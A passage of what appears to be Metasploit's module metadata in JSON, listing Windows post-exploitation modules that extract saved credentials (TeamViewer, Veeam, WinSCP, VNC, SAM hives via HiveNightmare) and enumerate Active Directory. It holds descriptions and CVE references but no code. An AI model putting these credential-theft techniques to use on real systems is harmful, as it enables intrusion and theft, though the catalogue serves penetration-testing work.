(such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for Tango credentials on a Windows host. 
Tango is a third-party, cross platform messaging application software for smartphones developed by TangoME, Inc.t", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/tango.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/tango", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/teamviewer_passwords": { - "name": "Windows Gather TeamViewer Passwords", - "fullname": "post/windows/gather/credentials/teamviewer_passwords", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Nic Losby ", - "Kali-Team " - ], - "description": "This module will find and decrypt stored TeamViewer passwords", - "references": [ - "CVE-2019-18988", - "URL-https://whynotsecurity.com/blog/teamviewer/", - "URL-https://www.cnblogs.com/Kali-Team/p/12468066.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/teamviewer_passwords.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/teamviewer_passwords", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/thunderbird": { - "name": "Thunderbird credential gatherer", - "fullname": 
"post/windows/gather/credentials/thunderbird", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kazuyoshi Maruta", - "Daniel Hallsworth", - "Barwar Salim M", - "Z. Cliffe Schreuders" - ], - "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for thunderbird credentials on a Windows host.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/thunderbird.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/thunderbird", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/thycotic_secretserver_dump": { - "name": "Delinea Thycotic Secret Server Dump", - "fullname": "post/windows/gather/credentials/thycotic_secretserver_dump", - "aliases": [], - "rank": 0, - "disclosure_date": "2022-08-15", - "type": "post", - "author": [ - "npm " - ], - "description": "This module exports and decrypts Secret Server credentials to a CSV file;\n it is intended as a post-exploitation module for Windows hosts with Delinea/Thycotic\n Secret Server installed. Master Encryption Key (MEK) and associated IV values are\n decrypted from encryption.config using a static key baked into the software. 
The\n module also supports parameter recovery for encryption configs configured with\n Windows DPAPI.", - "references": [ - "URL-https://github.com/denandz/SecretServerSecretStealer" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-09-29 13:58:54 +0000", - "path": "/modules/post/windows/gather/credentials/thycotic_secretserver_dump.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/thycotic_secretserver_dump", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [ - { - "name": "Dump", - "description": "Export Secret Server database and perform decryption" - }, - { - "name": "Export", - "description": "Export Secret Server database without decryption" - } - ] - }, - "post_windows/gather/credentials/tlen": { - "name": "Tlen credential gatherer", - "fullname": "post/windows/gather/credentials/tlen", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kazuyoshi Maruta", - "Daniel Hallsworth", - "Barwar Salim M", - "Z. Cliffe Schreuders" - ], - "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for Tlen credentials on a Windows host. 
Tlen is a free Polish instant messaging service.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/tlen.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/tlen", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/tortoisesvn": { - "name": "Windows Gather TortoiseSVN Saved Password Extraction", - "fullname": "post/windows/gather/credentials/tortoisesvn", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Justin Cacak" - ], - "description": "This module extracts and decrypts saved TortoiseSVN passwords. 
In\n order for decryption to be successful this module must be executed\n under the same privileges as the user which originally encrypted the\n password.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/tortoisesvn.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/tortoisesvn", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/total_commander": { - "name": "Windows Gather Total Commander Saved Password Extraction", - "fullname": "post/windows/gather/credentials/total_commander", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "theLightCosine " - ], - "description": "This module extracts weakly encrypted saved FTP Passwords from Total Commander.\n It finds saved FTP connections in the wcx_ftp.ini file.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/total_commander.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/total_commander", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/trillian": { - "name": "Windows Gather Trillian Password Extractor", - "fullname": "post/windows/gather/credentials/trillian", 
- "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Sil3ntDre4m ", - "Unknown" - ], - "description": "This module extracts account password from Trillian & Trillian Astra\n v4.x-5.x instant messenger.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/trillian.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/trillian", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/veeam_credential_dump": { - "name": "Veeam Backup and Replication Credentials Dump", - "fullname": "post/windows/gather/credentials/veeam_credential_dump", - "aliases": [], - "rank": 0, - "disclosure_date": "2022-11-22", - "type": "post", - "author": [ - "npm " - ], - "description": "This module exports and decrypts credentials from Veeam Backup & Replication and\n Veeam ONE Monitor Server to a CSV file; it is intended as a post-exploitation\n module for Windows hosts with either of these products installed. 
The module\n supports automatic detection of VBR / Veeam ONE and is capable of decrypting\n credentials for all versions including the latest build of 11.x.", - "references": [ - "URL-https://blog.checkymander.com/red%20team/veeam/decrypt-veeam-passwords/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-07-24 16:42:43 +0000", - "path": "/modules/post/windows/gather/credentials/veeam_credential_dump.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/veeam_credential_dump", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [ - { - "name": "Decrypt", - "description": "Decrypt Veeam database export CSV files" - }, - { - "name": "Dump", - "description": "Export Veeam databases and perform decryption" - }, - { - "name": "Export", - "description": "Export Veeam databases without decryption" - } - ] - }, - "post_windows/gather/credentials/viber": { - "name": "Viber credential gatherer", - "fullname": "post/windows/gather/credentials/viber", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kazuyoshi Maruta", - "Daniel Hallsworth", - "Barwar Salim M", - "Z. 
Cliffe Schreuders" - ], - "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for credentials in Viber desktop application on a remote Windows host. Viber is a cross-platform voice over IP and instant messaging software application.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-13 09:23:28 +0000", - "path": "/modules/post/windows/gather/credentials/viber.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/viber", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/vnc": { - "name": "Windows Gather VNC Password Extraction", - "fullname": "post/windows/gather/credentials/vnc", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kurt Grutzmacher ", - "mubix " - ], - "description": "This module extract DES encrypted passwords in known VNC locations", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/vnc.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/vnc", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - 
"Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/whatsupgold_credential_dump": { - "name": "WhatsUp Gold Credentials Dump", - "fullname": "post/windows/gather/credentials/whatsupgold_credential_dump", - "aliases": [], - "rank": 0, - "disclosure_date": "2022-11-22", - "type": "post", - "author": [ - "sshah ", - "npm " - ], - "description": "This module exports and decrypts credentials from WhatsUp Gold to a CSV file;\n it is intended as a post-exploitation module for Windows hosts with WhatsUp\n Gold installed. The module has been tested on and can successfully decrypt\n credentials from WhatsUp versions 11.0 to the latest (22.x). Extracted\n credentials are automatically added to loot.", - "references": [ - "CVE-2022-29845", - "CVE-2022-29846", - "CVE-2022-29847", - "CVE-2022-29848", - "URL-https://nvd.nist.gov/vuln/detail/CVE-2022-29845", - "URL-https://nvd.nist.gov/vuln/detail/CVE-2022-29846", - "URL-https://nvd.nist.gov/vuln/detail/CVE-2022-29847", - "URL-https://nvd.nist.gov/vuln/detail/CVE-2022-29848", - "URL-https://blog.assetnote.io/2022/06/09/whatsup-gold-exploit/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-07-24 16:42:43 +0000", - "path": "/modules/post/windows/gather/credentials/whatsupgold_credential_dump.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/whatsupgold_credential_dump", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [ - { - "name": "Decrypt", - "description": "Decrypt WhatsUp Gold database export CSV file" - }, 
- { - "name": "Dump", - "description": "Export WhatsUp Gold database and perform decryption" - }, - { - "name": "Export", - "description": "Export WhatsUp Gold database without decryption" - } - ] - }, - "post_windows/gather/credentials/winbox_settings": { - "name": "Windows Gather Mikrotik Winbox \"Keep Password\" Credentials Extractor", - "fullname": "post/windows/gather/credentials/winbox_settings", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Pasquale 'sid' Fiorillo" - ], - "description": "This module extracts Mikrotik Winbox credentials saved in the\n \"settings.cfg.viw\" file when the \"Keep Password\" option is\n selected in Winbox.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-09 00:43:10 +0000", - "path": "/modules/post/windows/gather/credentials/winbox_settings.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/winbox_settings", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [] - }, - "session_types": [ - "meterpreter", - "shell", - "powershell" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/windows_autologin": { - "name": "Windows Gather AutoLogin User Credential Extractor", - "fullname": "post/windows/gather/credentials/windows_autologin", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Myo Soe" - ], - "description": "This module extracts the plain-text Windows user login password in Registry.\n It exploits a Windows feature that Windows (2000 to 2008 R2) allows a\n user or third-party Windows Utility tools to configure User AutoLogin via\n plain-text password insertion in (Alt)DefaultPassword field in the registry\n location - 
HKLM\\Software\\Microsoft\\Windows NT\\WinLogon. This is readable\n by all users.", - "references": [ - "URL-http://support.microsoft.com/kb/315231", - "URL-http://core.yehg.net/lab/#tools.exploits" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/windows_autologin.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/windows_autologin", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/windows_sam_hivenightmare": { - "name": "Windows SAM secrets leak - HiveNightmare", - "fullname": "post/windows/gather/credentials/windows_sam_hivenightmare", - "aliases": [], - "rank": 300, - "disclosure_date": "2021-07-20", - "type": "post", - "author": [ - "Kevin Beaumont", - "romarroca", - "Yann Castel (yann.castel " - ], - "description": "Due to mismanagement of SAM and SYSTEM hives in Windows 10, it is possible for an unprivileged\n user to read those files. But, as they are locked while Windows is running we are not able\n to read them directly. The trick is to take advantage of Volume Shadow Copy, which is generally\n enabled, to finally have a read access. 
Once SAM and SYSTEM files are successfully dumped and\n stored in `store_loot`, you can dump the hashes with some external scripts like secretsdump.py", - "references": [ - "CVE-2021-36934", - "URL-https://github.com/GossiTheDog/HiveNightmare", - "URL-https://isc.sans.edu/diary/Summer+of+SAM+-+incorrect+permissions+on+Windows+1011+hives/27652", - "URL-https://github.com/romarroca/SeriousSam" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2021-10-06 13:43:31 +0000", - "path": "/modules/post/windows/gather/credentials/windows_sam_hivenightmare.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/windows_sam_hivenightmare", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "AKA": [ - "HiveNightmare", - "SeriousSAM" - ], - "Reliability": [], - "SideEffects": [], - "Stability": [ - "crash-safe" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/windowslivemail": { - "name": "Windows Live Mail credential gatherer", - "fullname": "post/windows/gather/credentials/windowslivemail", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kazuyoshi Maruta", - "Daniel Hallsworth", - "Barwar Salim M", - "Z. 
Cliffe Schreuders" - ], - "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for Windows Live Mail credentials on a Windows host.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/windowslivemail.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/windowslivemail", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/winscp": { - "name": "Windows Gather WinSCP Saved Password Extraction", - "fullname": "post/windows/gather/credentials/winscp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "theLightCosine " - ], - "description": "This module extracts weakly encrypted saved passwords from\n WinSCP. It searches for saved sessions in the Windows Registry\n and the WinSCP.ini file. 
It cannot decrypt passwords if a master\n password is used.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/winscp.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/winscp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/wsftp_client": { - "name": "Windows Gather WS_FTP Saved Password Extraction", - "fullname": "post/windows/gather/credentials/wsftp_client", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "theLightCosine " - ], - "description": "This module extracts weakly encrypted saved FTP Passwords\n from WS_FTP. 
It finds saved FTP connections in the ws_ftp.ini file.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-28 09:08:33 +0000", - "path": "/modules/post/windows/gather/credentials/wsftp_client.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/wsftp_client", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/xchat": { - "name": "XChat credential gatherer", - "fullname": "post/windows/gather/credentials/xchat", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kazuyoshi Maruta", - "Daniel Hallsworth", - "Barwar Salim M", - "Z. Cliffe Schreuders" - ], - "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for Xchat credentials on a Windows host. 
XChat is an IRC chat program for both Linux and Windows.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-05-13 09:23:28 +0000", - "path": "/modules/post/windows/gather/credentials/xchat.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/xchat", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/credentials/xshell_xftp_password": { - "name": "Windows Gather Xshell and Xftp Passwords", - "fullname": "post/windows/gather/credentials/xshell_xftp_password", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Kali-Team " - ], - "description": "This module can decrypt the password of xshell and xftp,\n if the user chooses to remember the password.", - "references": [ - "URL-https://github.com/HyperSine/how-does-Xmanager-encrypt-password/blob/master/doc/how-does-Xmanager-encrypt-password.md" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-02-03 18:12:53 +0000", - "path": "/modules/post/windows/gather/credentials/xshell_xftp_password.rb", - "is_install_path": true, - "ref_name": "windows/gather/credentials/xshell_xftp_password", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/dnscache_dump": { - "name": "Windows Gather DNS Cache", - "fullname": "post/windows/gather/dnscache_dump", - "aliases": [], - "rank": 
300, - "disclosure_date": null, - "type": "post", - "author": [ - "Borja Merino " - ], - "description": "This module displays the records stored in the DNS cache.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/dnscache_dump.rb", - "is_install_path": true, - "ref_name": "windows/gather/dnscache_dump", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/dumplinks": { - "name": "Windows Gather Dump Recent Files lnk Info", - "fullname": "post/windows/gather/dumplinks", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "davehull " - ], - "description": "The dumplinks module is a modified port of Harlan Carvey's lslnk.pl Perl script.\n This module will parse .lnk files from a user's Recent Documents folder\n and Microsoft Office's Recent Documents folder, if present.\n Windows creates these link files automatically for many common file types.\n The .lnk files contain time stamps, file locations, including share\n names, volume serial numbers, and more.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/dumplinks.rb", - "is_install_path": true, - "ref_name": "windows/gather/dumplinks", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, 
- "post_windows/gather/enum_ad_bitlocker": { - "name": "Windows Gather Active Directory BitLocker Recovery", - "fullname": "post/windows/gather/enum_ad_bitlocker", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Ben Campbell " - ], - "description": "This module will enumerate BitLocker recovery passwords in the default AD\n directory. This module does require Domain Admin or other delegated privileges.", - "references": [ - "URL-https://technet.microsoft.com/en-us/library/cc771778%28v=ws.10%29.aspx" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/enum_ad_bitlocker.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_ad_bitlocker", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_ad_computers": { - "name": "Windows Gather Active Directory Computers", - "fullname": "post/windows/gather/enum_ad_computers", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Ben Campbell " - ], - "description": "This module will enumerate computers in the default AD directory.\n\n Optional Attributes to use in ATTRIBS:\n objectClass, cn, description, distinguishedName, instanceType, whenCreated,\n whenChanged, uSNCreated, uSNChanged, name, objectGUID,\n userAccountControl, badPwdCount, codePage, countryCode,\n badPasswordTime, lastLogoff, lastLogon, localPolicyFlags,\n pwdLastSet, primaryGroupID, objectSid, accountExpires,\n logonCount, sAMAccountName, sAMAccountType, operatingSystem,\n operatingSystemVersion, operatingSystemServicePack, serverReferenceBL,\n dNSHostName, 
rIDSetPreferences, servicePrincipalName, objectCategory,\n netbootSCPBL, isCriticalSystemObject, frsComputerReferenceBL,\n lastLogonTimestamp, msDS-SupportedEncryptionTypes\n\n ActiveDirectory has a MAX_SEARCH limit of 1000 by default. Split search up\n if you hit that limit.\n\n Possible filters:\n (objectClass=computer) # All Computers\n (primaryGroupID=516) # All Domain Controllers\n (&(objectCategory=computer)(operatingSystem=*server*)) # All Servers", - "references": [ - "URL-http://social.technet.microsoft.com/wiki/contents/articles/5392.active-directory-ldap-syntax-filters.aspx" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/enum_ad_computers.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_ad_computers", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_ad_groups": { - "name": "Windows Gather Active Directory Groups", - "fullname": "post/windows/gather/enum_ad_groups", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Stuart Morgan " - ], - "description": "This module will enumerate AD groups on the specified domain.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/enum_ad_groups.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_ad_groups", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - 
"Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_ad_managedby_groups": { - "name": "Windows Gather Active Directory Managed Groups", - "fullname": "post/windows/gather/enum_ad_managedby_groups", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Stuart Morgan " - ], - "description": "This module will enumerate AD groups on the specified domain which are specifically managed.\n It cannot at the moment identify whether the 'Manager can update membership list' option\n option set; if so, it would allow that member to update the contents of that group. This\n could either be used as a persistence mechanism (for example, set your user as the 'Domain\n Admins' group manager) or could be used to detect privilege escalation opportunities\n without having domain admin privileges.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-30 11:23:07 +0000", - "path": "/modules/post/windows/gather/enum_ad_managedby_groups.rb", - "is_install_path": true, - "ref_name": "windows/gather/enum_ad_managedby_groups", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "post_windows/gather/enum_ad_service_principal_names": { - "name": "Windows Gather Active Directory Service Principal Names", - "fullname": "post/windows/gather/enum_ad_service_principal_names", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "post", - "author": [ - "Ben Campbell ", - "Scott Sutherland" - ], - "description": "This module will enumerate servicePrincipalName in the default AD directory\n where the user is a member of the Domain Admins 
